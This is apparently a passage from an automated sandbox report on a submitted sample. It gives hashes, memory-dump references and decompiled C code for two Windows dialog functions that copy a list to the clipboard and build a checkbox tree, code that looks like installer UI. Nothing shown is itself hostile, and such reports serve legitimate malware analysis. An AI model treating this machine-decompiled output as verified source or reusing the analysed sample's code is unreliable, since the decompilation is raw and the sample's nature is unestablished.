                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 00404F61, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x4de368
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                      0x00404f6a
                      0x00404f70
                      0x00404f79
                      0x00404f7c
                      0x0040510d
                      0x00405114
                      0x00405138
                      0x00405138
                      0x0040513e
                      0x0040514b
                      0x00405169
                      0x00405169
                      0x00405170
                      0x004051c7
                      0x004051c7
                      0x004051cb
                      0x00000000
                      0x00000000
                      0x004051cd
                      0x004051d0
                      0x00000000
                      0x00000000
                      0x004051da
                      0x004051e0
                      0x004051e2
                      0x004051e5
                      0x004052de
                      0x00000000
                      0x004052de
                      0x004051f4
                      0x00405200
                      0x00405206
                      0x00405209
                      0x0040520c
                      0x00405221
                      0x00405224
                      0x00405224
                      0x00405227
                      0x0040520e
                      0x00405213
                      0x00405219
                      0x0040521c
                      0x0040521c
                      0x00405237
                      0x0040523f
                      0x00405240
                      0x00405242
                      0x0040524b
                      0x0040524e
                      0x00405255
                      0x0040525c
                      0x00405264
                      0x00405264
                      0x00405272
                      0x00405278
                      0x0040527b
                      0x0040527b
                      0x00405282
                      0x00405288
                      0x00405291
                      0x00405298
                      0x004052a1
                      0x004052a3
                      0x004052a6
                      0x004052b5
                      0x004052b7
                      0x004052bd
                      0x004052be
                      0x004052bf
                      0x004052bf
                      0x004052c7
                      0x004052d2
                      0x004052d8
                      0x004052d8
                      0x00000000
                      0x00405242
                      0x00405172
                      0x00405178
                      0x004051a8
                      0x004051aa
                      0x004051b0
                      0x004051b2
                      0x004051bb
                      0x004051bb
                      0x004051c2
                      0x00000000
                      0x004051c2
                      0x0040517c
                      0x00405186
                      0x00000000
                      0x0040514d
                      0x0040514d
                      0x00405153
                      0x0040518b
                      0x00000000
                      0x00405194
                      0x0040515c
                      0x00405161
                      0x00405164
                      0x00000000
                      0x00405164
                      0x0040514b
                      0x00404f82
                      0x00404f86
                      0x00404f8f
                      0x00404f96
                      0x00404f99
                      0x00404f9c
                      0x00404f9f
                      0x00404fa0
                      0x00404fa1
                      0x00404fba
                      0x00404fbd
                      0x00404fc7
                      0x00404fd6
                      0x00404fde
                      0x00404fe6
                      0x00404feb
                      0x00404fee
                      0x00404ffa
                      0x00405003
                      0x0040500c
                      0x0040502f
                      0x00405035
                      0x00405046
                      0x0040504b
                      0x00405059
                      0x00405067
                      0x00405067
                      0x0040506c
                      0x0040507a
                      0x0040507a
                      0x0040507f
                      0x00405082
                      0x00405087
                      0x00405093
                      0x0040509c
                      0x004050a9
                      0x004050b8
                      0x004050ab
                      0x004050b0
                      0x004050b0
                      0x004050c4
                      0x004050c4
                      0x004050d8
                      0x004050e1
                      0x004050ea
                      0x004050fa
                      0x00405106
                      0x00405106
                      0x00000000

                      APIs
                      • GetDlgItem.USER32 ref: 00404FC0
                      • GetDlgItem.USER32 ref: 00404FCF
                      • GetClientRect.USER32 ref: 0040500C
                      • GetSystemMetrics.USER32 ref: 00405014
                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                      • ShowWindow.USER32(?,00000008), ref: 004050B0
                      • GetDlgItem.USER32 ref: 004050D1
                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                      • GetDlgItem.USER32 ref: 00404FDE
                        • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                      • GetDlgItem.USER32 ref: 00405123
                      • CreateThread.KERNEL32 ref: 00405131
                      • CloseHandle.KERNEL32(00000000), ref: 00405138
                      • ShowWindow.USER32(00000000), ref: 0040515C
                      • ShowWindow.USER32(00000000,00000008), ref: 00405161
                      • ShowWindow.USER32(00000008), ref: 004051A8
                      • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                      • CreatePopupMenu.USER32 ref: 004051EB
                      • AppendMenuA.USER32 ref: 00405200
                      • GetWindowRect.USER32 ref: 00405213
                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                      • OpenClipboard.USER32(00000000), ref: 00405282
                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                      • GlobalLock.KERNEL32 ref: 0040529B
                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                      • SetClipboardData.USER32 ref: 004052D2
                      • CloseClipboard.USER32 ref: 004052D8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                      • String ID: hM${
                      • API String ID: 590372296-4057279144
                      • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                      • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404772, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8; // 0x4de514
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423eb0; // 0x4de368
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423eb9 & 0x00000002;
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x2
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x4de514
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x4e3b8b
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x4de51c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x4de52c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                      0x00404790
                      0x00404796
                      0x00404798
                      0x0040479e
                      0x004047a4
                      0x004047a7
                      0x004047b1
                      0x004047ba
                      0x004047bd
                      0x004047c0
                      0x004049e8
                      0x004049e8
                      0x004049ef
                      0x00404a03
                      0x004049f1
                      0x004049f3
                      0x004049f6
                      0x004049f7
                      0x004049fe
                      0x004049fe
                      0x00404a06
                      0x00404a0f
                      0x00404a1a
                      0x00404a1a
                      0x00404a1d
                      0x00404a20
                      0x00404a2f
                      0x00404a2f
                      0x00404a36
                      0x00404aae
                      0x00404aae
                      0x00404ab1
                      0x00404ab3
                      0x00404ab6
                      0x00404abd
                      0x00404acb
                      0x00404acb
                      0x00404acd
                      0x00404ad0
                      0x00404ad7
                      0x00404ad9
                      0x00404add
                      0x00404afa
                      0x00404afe
                      0x00404afe
                      0x00404adf
                      0x00404aec
                      0x00404aec
                      0x00404add
                      0x00404ad7
                      0x00000000
                      0x00404ab1
                      0x00404a38
                      0x00404a3b
                      0x00404a46
                      0x00404a48
                      0x00404a4b
                      0x00404a52
                      0x00404a57
                      0x00404a59
                      0x00404a63
                      0x00404a63
                      0x00404a67
                      0x00404a69
                      0x00404a6c
                      0x00404a6e
                      0x00404a71
                      0x00404a87
                      0x00404a87
                      0x00404a73
                      0x00404a73
                      0x00404a79
                      0x00404a7b
                      0x00404a82
                      0x00404a7d
                      0x00404a7d
                      0x00404a7d
                      0x00404a7b
                      0x00404a8b
                      0x00404a8d
                      0x00404a92
                      0x00404a9b
                      0x00404a9c
                      0x00404aa6
                      0x00404aa6
                      0x00404aa8
                      0x00404aab
                      0x00404aab
                      0x00404a6c
                      0x00000000
                      0x00404a59
                      0x00404a3d
                      0x00404a40
                      0x00404a44
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404a44
                      0x00404a22
                      0x00404a29
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404a11
                      0x00404a11
                      0x00404a14
                      0x00404b01
                      0x00404b01
                      0x00404b08
                      0x00404b7c
                      0x00404b7c
                      0x00404b83
                      0x00404b8f
                      0x00404b8f
                      0x00404b91
                      0x00404b98
                      0x00404b9a
                      0x00404b9f
                      0x00404ba1
                      0x00404ba4
                      0x00404ba4
                      0x00404baa
                      0x00404baf
                      0x00404bb1
                      0x00404bb4
                      0x00404bb4
                      0x00404bba
                      0x00404bc0
                      0x00404bc6
                      0x00404bc6
                      0x00404bcc
                      0x00404bd3
                      0x00404d20
                      0x00404d20
                      0x00404d27
                      0x00404d29
                      0x00404d30
                      0x00404d34
                      0x00404d41
                      0x00404d41
                      0x00404d44
                      0x00404d4a
                      0x00404d5c
                      0x00404d5c
                      0x00404d30
                      0x00000000
                      0x00404bd9
                      0x00404bdb
                      0x00404be0
                      0x00404be3
                      0x00404be7
                      0x00404be7
                      0x00404bec
                      0x00404bef
                      0x00404c30
                      0x00404c32
                      0x00404c3c
                      0x00404c42
                      0x00404c45
                      0x00404c4a
                      0x00404c51
                      0x00404c54
                      0x00404cf6
                      0x00404cfc
                      0x00404d02
                      0x00404d07
                      0x00404d0a
                      0x00404d1b
                      0x00404d1b
                      0x00000000
                      0x00404c5a
                      0x00404c5a
                      0x00404c5a
                      0x00404c5d
                      0x00404c63
                      0x00404c66
                      0x00404c68
                      0x00404c6a
                      0x00404c6c
                      0x00404c6f
                      0x00404c72
                      0x00404c79
                      0x00404c7b
                      0x00404c7e
                      0x00404c85
                      0x00404c88
                      0x00404c88
                      0x00404c88
                      0x00404c88
                      0x00404c8c
                      0x00404c8f
                      0x00404c9b
                      0x00404c9c
                      0x00404c9f
                      0x00404ca1
                      0x00404ca1
                      0x00404ca1
                      0x00404c91
                      0x00404c93
                      0x00404c93
                      0x00404cc0
                      0x00404cc0
                      0x00404cc1
                      0x00404ccd
                      0x00404cdc
                      0x00404cdc
                      0x00404cde
                      0x00404ce1
                      0x00404cea
                      0x00404cea
                      0x00000000
                      0x00404c5d
                      0x00404bf1
                      0x00404bfc
                      0x00404bff
                      0x00404c04
                      0x00404c06
                      0x00404c08
                      0x00404c0a
                      0x00404c1a
